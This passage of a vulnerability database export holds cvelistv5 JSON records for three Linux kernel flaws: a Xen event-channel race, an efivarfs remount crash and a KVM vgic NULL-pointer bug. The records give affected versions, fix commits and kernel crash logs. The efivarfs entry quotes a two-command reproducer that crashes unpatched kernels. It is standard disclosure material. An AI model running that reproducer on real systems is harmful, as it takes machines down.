"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:07.213399Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:32.707Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/xen/events/events_base.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9470f5b2503cae994098dea9682aee15b313fa44",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "ea592baf9e41779fe9a0424c03dd2f324feca3b3",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "585a344af6bcac222608a158fc2830ff02712af5",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "20980195ec8d2e41653800c45c8c367fa1b1f2b4",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "9be71aa12afa91dfe457b3fb4a444c42b1ee036b",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
},
{
"lessThan": "fa765c4b4aed2d64266b694520ecb025c862c5a9",
"status": "affected",
"version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/xen/events/events_base.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.37"
},
{
"lessThan": "2.6.37",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/events: close evtchn after mapping cleanup\n\nshutdown_pirq and startup_pirq are not taking the\nirq_mapping_update_lock because they can\u0027t due to lock inversion. Both\nare called with the irq_desc-\u003elock being taking. The lock order,\nhowever, is first irq_mapping_update_lock and then irq_desc-\u003elock.\n\nThis opens multiple races:\n- shutdown_pirq can be interrupted by a function that allocates an event\n channel:\n\n CPU0 CPU1\n shutdown_pirq {\n xen_evtchn_close(e)\n __startup_pirq {\n EVTCHNOP_bind_pirq\n -\u003e returns just freed evtchn e\n set_evtchn_to_irq(e, irq)\n }\n xen_irq_info_cleanup() {\n set_evtchn_to_irq(e, -1)\n }\n }\n\n Assume here event channel e refers here to the same event channel\n number.\n After this race the evtchn_to_irq mapping for e is invalid (-1).\n\n- __startup_pirq races with __unbind_from_irq in a similar way. Because\n __startup_pirq doesn\u0027t take irq_mapping_update_lock it can grab the\n evtchn that __unbind_from_irq is currently freeing and cleaning up. In\n this case even though the event channel is allocated, its mapping can\n be unset in evtchn_to_irq.\n\nThe fix is to first cleanup the mappings and then close the event\nchannel. In this way, when an event channel gets allocated it\u0027s\npotential previous evtchn_to_irq mappings are guaranteed to be unset already.\nThis is also the reverse order of the allocation where first the event\nchannel is allocated and then the mappings are setup.\n\nOn a 5.10 kernel prior to commit 3fcdaf3d7634 (\"xen/events: modify internal\n[un]bind interfaces\"), we hit a BUG like the following during probing of NVMe\ndevices. The issue is that during nvme_setup_io_queues, pci_free_irq\nis called for every device which results in a call to shutdown_pirq.\nWith many nvme devices it\u0027s therefore likely to hit this race during\nboot because there will be multiple calls to shutdown_pirq and\nstartup_pirq are running potentially in parallel.\n\n ------------[ cut here ]------------\n blkfront: xvda: barrier or flush: disabled; persistent grants: enabled; indirect descriptors: enabled; bounce buffer: enabled\n kernel BUG at drivers/xen/events/events_base.c:499!\n invalid opcode: 0000 [#1] SMP PTI\n CPU: 44 PID: 375 Comm: kworker/u257:23 Not tainted 5.10.201-191.748.amzn2.x86_64 #1\n Hardware name: Xen HVM domU, BIOS 4.11.amazon 08/24/2006\n Workqueue: nvme-reset-wq nvme_reset_work\n RIP: 0010:bind_evtchn_to_cpu+0xdf/0xf0\n Code: 5d 41 5e c3 cc cc cc cc 44 89 f7 e8 2b 55 ad ff 49 89 c5 48 85 c0 0f 84 64 ff ff ff 4c 8b 68 30 41 83 fe ff 0f 85 60 ff ff ff \u003c0f\u003e 0b 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 0f 1f 44 00 00\n RSP: 0000:ffffc9000d533b08 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000006\n RDX: 0000000000000028 RSI: 00000000ffffffff RDI: 00000000ffffffff\n RBP: ffff888107419680 R08: 0000000000000000 R09: ffffffff82d72b00\n R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000001ed\n R13: 0000000000000000 R14: 00000000ffffffff R15: 0000000000000002\n FS: 0000000000000000(0000) GS:ffff88bc8b500000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000000002610001 CR4: 00000000001706e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n ? show_trace_log_lvl+0x1c1/0x2d9\n ? show_trace_log_lvl+0x1c1/0x2d9\n ? set_affinity_irq+0xdc/0x1c0\n ? __die_body.cold+0x8/0xd\n ? die+0x2b/0x50\n ? do_trap+0x90/0x110\n ? bind_evtchn_to_cpu+0xdf/0xf0\n ? do_error_trap+0x65/0x80\n ? bind_evtchn_to_cpu+0xdf/0xf0\n ? exc_invalid_op+0x4e/0x70\n ? bind_evtchn_to_cpu+0xdf/0xf0\n ? asm_exc_invalid_op+0x12/0x20\n ? bind_evtchn_to_cpu+0xdf/0x\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:04.797Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9470f5b2503cae994098dea9682aee15b313fa44"
},
{
"url": "https://git.kernel.org/stable/c/0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd"
},
{
"url": "https://git.kernel.org/stable/c/ea592baf9e41779fe9a0424c03dd2f324feca3b3"
},
{
"url": "https://git.kernel.org/stable/c/585a344af6bcac222608a158fc2830ff02712af5"
},
{
"url": "https://git.kernel.org/stable/c/20980195ec8d2e41653800c45c8c367fa1b1f2b4"
},
{
"url": "https://git.kernel.org/stable/c/9be71aa12afa91dfe457b3fb4a444c42b1ee036b"
},
{
"url": "https://git.kernel.org/stable/c/fa765c4b4aed2d64266b694520ecb025c862c5a9"
}
],
"title": "xen/events: close evtchn after mapping cleanup",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26687",
"datePublished": "2024-04-03T14:54:49.250Z",
"dateReserved": "2024-02-19T14:20:24.154Z",
"dateUpdated": "2025-05-04T08:54:04.797Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52463 (GCVE-0-2023-52463)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
efivarfs: force RO when remounting if SetVariable is not supported
If SetVariable at runtime is not supported by the firmware we never assign
a callback for that function. At the same time mount the efivarfs as
RO so no one can call that. However, we never check the permission flags
when someone remounts the filesystem as RW. As a result this leads to a
crash looking like this:
$ mount -o remount,rw /sys/firmware/efi/efivars
$ efi-updatevar -f PK.auth PK
[ 303.279166] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000
[ 303.280482] Mem abort info:
[ 303.280854] ESR = 0x0000000086000004
[ 303.281338] EC = 0x21: IABT (current EL), IL = 32 bits
[ 303.282016] SET = 0, FnV = 0
[ 303.282414] EA = 0, S1PTW = 0
[ 303.282821] FSC = 0x04: level 0 translation fault
[ 303.283771] user pgtable: 4k pages, 48-bit VAs, pgdp=000000004258c000
[ 303.284913] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000
[ 303.286076] Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP
[ 303.286936] Modules linked in: qrtr tpm_tis tpm_tis_core crct10dif_ce arm_smccc_trng rng_core drm fuse ip_tables x_tables ipv6
[ 303.288586] CPU: 1 PID: 755 Comm: efi-updatevar Not tainted 6.3.0-rc1-00108-gc7d0c4695c68 #1
[ 303.289748] Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.04-00627-g88336918701d 04/01/2023
[ 303.291150] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 303.292123] pc : 0x0
[ 303.292443] lr : efivar_set_variable_locked+0x74/0xec
[ 303.293156] sp : ffff800008673c10
[ 303.293619] x29: ffff800008673c10 x28: ffff0000037e8000 x27: 0000000000000000
[ 303.294592] x26: 0000000000000800 x25: ffff000002467400 x24: 0000000000000027
[ 303.295572] x23: ffffd49ea9832000 x22: ffff0000020c9800 x21: ffff000002467000
[ 303.296566] x20: 0000000000000001 x19: 00000000000007fc x18: 0000000000000000
[ 303.297531] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaaac807ab54
[ 303.298495] x14: ed37489f673633c0 x13: 71c45c606de13f80 x12: 47464259e219acf4
[ 303.299453] x11: ffff000002af7b01 x10: 0000000000000003 x9 : 0000000000000002
[ 303.300431] x8 : 0000000000000010 x7 : ffffd49ea8973230 x6 : 0000000000a85201
[ 303.301412] x5 : 0000000000000000 x4 : ffff0000020c9800 x3 : 00000000000007fc
[ 303.302370] x2 : 0000000000000027 x1 : ffff000002467400 x0 : ffff000002467000
[ 303.303341] Call trace:
[ 303.303679] 0x0
[ 303.303938] efivar_entry_set_get_size+0x98/0x16c
[ 303.304585] efivarfs_file_write+0xd0/0x1a4
[ 303.305148] vfs_write+0xc4/0x2e4
[ 303.305601] ksys_write+0x70/0x104
[ 303.306073] __arm64_sys_write+0x1c/0x28
[ 303.306622] invoke_syscall+0x48/0x114
[ 303.307156] el0_svc_common.constprop.0+0x44/0xec
[ 303.307803] do_el0_svc+0x38/0x98
[ 303.308268] el0_svc+0x2c/0x84
[ 303.308702] el0t_64_sync_handler+0xf4/0x120
[ 303.309293] el0t_64_sync+0x190/0x194
[ 303.309794] Code: ???????? ???????? ???????? ???????? (????????)
[ 303.310612] ---[ end trace 0000000000000000 ]---
Fix this by adding a .reconfigure() function to the fs operations which
we can use to check the requested flags and deny anything that's not RO
if the firmware doesn't implement SetVariable at runtime.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f88814cc2578c121e6edef686365036db72af0ed Version: f88814cc2578c121e6edef686365036db72af0ed Version: f88814cc2578c121e6edef686365036db72af0ed Version: f88814cc2578c121e6edef686365036db72af0ed Version: f88814cc2578c121e6edef686365036db72af0ed Version: f88814cc2578c121e6edef686365036db72af0ed Version: 552952e51fad35670459674bcb8a03bd96fe4646 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52463",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-04T20:59:53.029082Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:24.597Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.782Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94c742324ed7e42c5bd6a9ed22e4ec6d764db4d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2aa141f8bc580f8f9811dfe4e0e6009812b73826"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4a9aa7db574a0da64307729cc031fb68597aa8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0049fe7e4a85849bdd778cdb72e51a791ff3d737"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4a714873db0866cc471521114eeac4a5072d548"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e8d2444168dd519fea501599d150e62718ed2fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/efivarfs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "94c742324ed7e42c5bd6a9ed22e4ec6d764db4d8",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"lessThan": "2aa141f8bc580f8f9811dfe4e0e6009812b73826",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"lessThan": "d4a9aa7db574a0da64307729cc031fb68597aa8b",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"lessThan": "0049fe7e4a85849bdd778cdb72e51a791ff3d737",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"lessThan": "d4a714873db0866cc471521114eeac4a5072d548",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"lessThan": "0e8d2444168dd519fea501599d150e62718ed2fe",
"status": "affected",
"version": "f88814cc2578c121e6edef686365036db72af0ed",
"versionType": "git"
},
{
"status": "affected",
"version": "552952e51fad35670459674bcb8a03bd96fe4646",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/efivarfs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.7.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: force RO when remounting if SetVariable is not supported\n\nIf SetVariable at runtime is not supported by the firmware we never assign\na callback for that function. At the same time mount the efivarfs as\nRO so no one can call that. However, we never check the permission flags\nwhen someone remounts the filesystem as RW. As a result this leads to a\ncrash looking like this:\n\n$ mount -o remount,rw /sys/firmware/efi/efivars\n$ efi-updatevar -f PK.auth PK\n\n[ 303.279166] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n[ 303.280482] Mem abort info:\n[ 303.280854] ESR = 0x0000000086000004\n[ 303.281338] EC = 0x21: IABT (current EL), IL = 32 bits\n[ 303.282016] SET = 0, FnV = 0\n[ 303.282414] EA = 0, S1PTW = 0\n[ 303.282821] FSC = 0x04: level 0 translation fault\n[ 303.283771] user pgtable: 4k pages, 48-bit VAs, pgdp=000000004258c000\n[ 303.284913] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000\n[ 303.286076] Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP\n[ 303.286936] Modules linked in: qrtr tpm_tis tpm_tis_core crct10dif_ce arm_smccc_trng rng_core drm fuse ip_tables x_tables ipv6\n[ 303.288586] CPU: 1 PID: 755 Comm: efi-updatevar Not tainted 6.3.0-rc1-00108-gc7d0c4695c68 #1\n[ 303.289748] Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.04-00627-g88336918701d 04/01/2023\n[ 303.291150] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 303.292123] pc : 0x0\n[ 303.292443] lr : efivar_set_variable_locked+0x74/0xec\n[ 303.293156] sp : ffff800008673c10\n[ 303.293619] x29: ffff800008673c10 x28: ffff0000037e8000 x27: 0000000000000000\n[ 303.294592] x26: 0000000000000800 x25: ffff000002467400 x24: 0000000000000027\n[ 303.295572] x23: ffffd49ea9832000 x22: ffff0000020c9800 x21: ffff000002467000\n[ 303.296566] x20: 0000000000000001 x19: 00000000000007fc x18: 0000000000000000\n[ 303.297531] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaaac807ab54\n[ 303.298495] x14: ed37489f673633c0 x13: 71c45c606de13f80 x12: 47464259e219acf4\n[ 303.299453] x11: ffff000002af7b01 x10: 0000000000000003 x9 : 0000000000000002\n[ 303.300431] x8 : 0000000000000010 x7 : ffffd49ea8973230 x6 : 0000000000a85201\n[ 303.301412] x5 : 0000000000000000 x4 : ffff0000020c9800 x3 : 00000000000007fc\n[ 303.302370] x2 : 0000000000000027 x1 : ffff000002467400 x0 : ffff000002467000\n[ 303.303341] Call trace:\n[ 303.303679] 0x0\n[ 303.303938] efivar_entry_set_get_size+0x98/0x16c\n[ 303.304585] efivarfs_file_write+0xd0/0x1a4\n[ 303.305148] vfs_write+0xc4/0x2e4\n[ 303.305601] ksys_write+0x70/0x104\n[ 303.306073] __arm64_sys_write+0x1c/0x28\n[ 303.306622] invoke_syscall+0x48/0x114\n[ 303.307156] el0_svc_common.constprop.0+0x44/0xec\n[ 303.307803] do_el0_svc+0x38/0x98\n[ 303.308268] el0_svc+0x2c/0x84\n[ 303.308702] el0t_64_sync_handler+0xf4/0x120\n[ 303.309293] el0t_64_sync+0x190/0x194\n[ 303.309794] Code: ???????? ???????? ???????? ???????? (????????)\n[ 303.310612] ---[ end trace 0000000000000000 ]---\n\nFix this by adding a .reconfigure() function to the fs operations which\nwe can use to check the requested flags and deny anything that\u0027s not RO\nif the firmware doesn\u0027t implement SetVariable at runtime."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:04.560Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/94c742324ed7e42c5bd6a9ed22e4ec6d764db4d8"
},
{
"url": "https://git.kernel.org/stable/c/2aa141f8bc580f8f9811dfe4e0e6009812b73826"
},
{
"url": "https://git.kernel.org/stable/c/d4a9aa7db574a0da64307729cc031fb68597aa8b"
},
{
"url": "https://git.kernel.org/stable/c/0049fe7e4a85849bdd778cdb72e51a791ff3d737"
},
{
"url": "https://git.kernel.org/stable/c/d4a714873db0866cc471521114eeac4a5072d548"
},
{
"url": "https://git.kernel.org/stable/c/0e8d2444168dd519fea501599d150e62718ed2fe"
}
],
"title": "efivarfs: force RO when remounting if SetVariable is not supported",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52463",
"datePublished": "2024-02-23T14:46:23.537Z",
"dateReserved": "2024-02-20T12:30:33.296Z",
"dateUpdated": "2025-05-04T12:49:04.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36953 (GCVE-0-2024-36953)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-v2: Check for non-NULL vCPU in vgic_v2_parse_attr()
vgic_v2_parse_attr() is responsible for finding the vCPU that matches
the user-provided CPUID, which (of course) may not be valid. If the ID
is invalid, kvm_get_vcpu_by_id() returns NULL, which isn't handled
gracefully.
Similar to the GICv3 uaccess flow, check that kvm_get_vcpu_by_id()
actually returns something and fail the ioctl if not.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7d450e2821710718fd6703e9c486249cee913bab Version: 7d450e2821710718fd6703e9c486249cee913bab Version: 7d450e2821710718fd6703e9c486249cee913bab Version: 7d450e2821710718fd6703e9c486249cee913bab Version: 7d450e2821710718fd6703e9c486249cee913bab Version: 7d450e2821710718fd6703e9c486249cee913bab |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36953",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:25:29.061156Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T18:46:17.103Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4404465a1bee3607ad90a4c5f9e16dfd75b85728"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17db92da8be5dd3bf63c01f4109fe47db64fc66f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a5b0378ac6776c7c31b18e0f3c1389bd6005e80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d6a1c8e3de36cb0f5e866f1a582b00939e23104"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01981276d64e542c177b243f7c979fee855d5487"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ddb4f372fc63210034b903d96ebbeb3c7195adb"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/arm64/kvm/vgic/vgic-kvm-device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4404465a1bee3607ad90a4c5f9e16dfd75b85728",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
},
{
"lessThan": "17db92da8be5dd3bf63c01f4109fe47db64fc66f",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
},
{
"lessThan": "3a5b0378ac6776c7c31b18e0f3c1389bd6005e80",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
},
{
"lessThan": "8d6a1c8e3de36cb0f5e866f1a582b00939e23104",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
},
{
"lessThan": "01981276d64e542c177b243f7c979fee855d5487",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
},
{
"lessThan": "6ddb4f372fc63210034b903d96ebbeb3c7195adb",
"status": "affected",
"version": "7d450e2821710718fd6703e9c486249cee913bab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/arm64/kvm/vgic/vgic-kvm-device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
